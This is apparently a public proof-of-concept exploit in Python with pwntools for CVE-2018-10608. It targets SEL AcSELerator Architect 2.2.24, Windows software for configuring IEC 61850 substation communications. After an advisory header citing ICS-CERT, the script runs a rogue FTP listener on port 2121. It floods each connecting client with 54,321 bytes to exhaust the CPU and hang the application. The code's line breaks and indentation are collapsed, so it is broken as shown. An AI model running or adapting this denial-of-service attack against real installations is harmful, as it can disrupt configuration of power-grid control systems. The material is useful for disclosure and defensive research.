#!/usr/bin/env python# coding: utf8### SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service### Vendor: Schweitzer Engineering Laboratories, Inc.# Product web page: https://www.selinc.com# Affected version: 2.2.24.0 (ICD package version: 2.38.0)## Summary: Substation communications networks using the IEC 61850# MMS and GOOSE protocols require a systemic methodology to configure# message publications and subscriptions. acSELerator Architect# SEL-5032 Software is a Microsoft Windows application that streamlines# the configuration and documentation of IEC 61850 control and SCADA# communications.## Description: AcSELerator Architect is prone to a denial-of-service (DoS)# vulnerability. An attacker may exploit this issue to cause CPU exhaustion,# resulting in application rendered non-responsive (AppHangB1 event).## Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit## Vulnerability discovered by Gjoko 'LiquidWorm' Krstic### Advisory: https://applied-risk.com/index.php/download_file/view/106/165# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608## 22.02.2018#from pwn import *
cool_data = '\x4A'* 54321
def bunn():
print """
####################################
SEL AcSELerator Architect 2.2.24.0
FTP Client Remote CPU Exhaustion
(c) 2018
####################################
"""
def main():
p = listen(2121)try:
log.warn('Payload ready for deployment...(Ctrl-C for exit)\n')while True:
p.wait_for_connection()if p:
sys.stdout.write('▓≡')
p.send(cool_data)
except KeyboardInterrupt:
p.success('OK!')
p.close()
except EOFError:
print "Unexpected error brah:", sys.exc_info()[0]
p.close()if __name__ == '__main__':
bunn()
main()
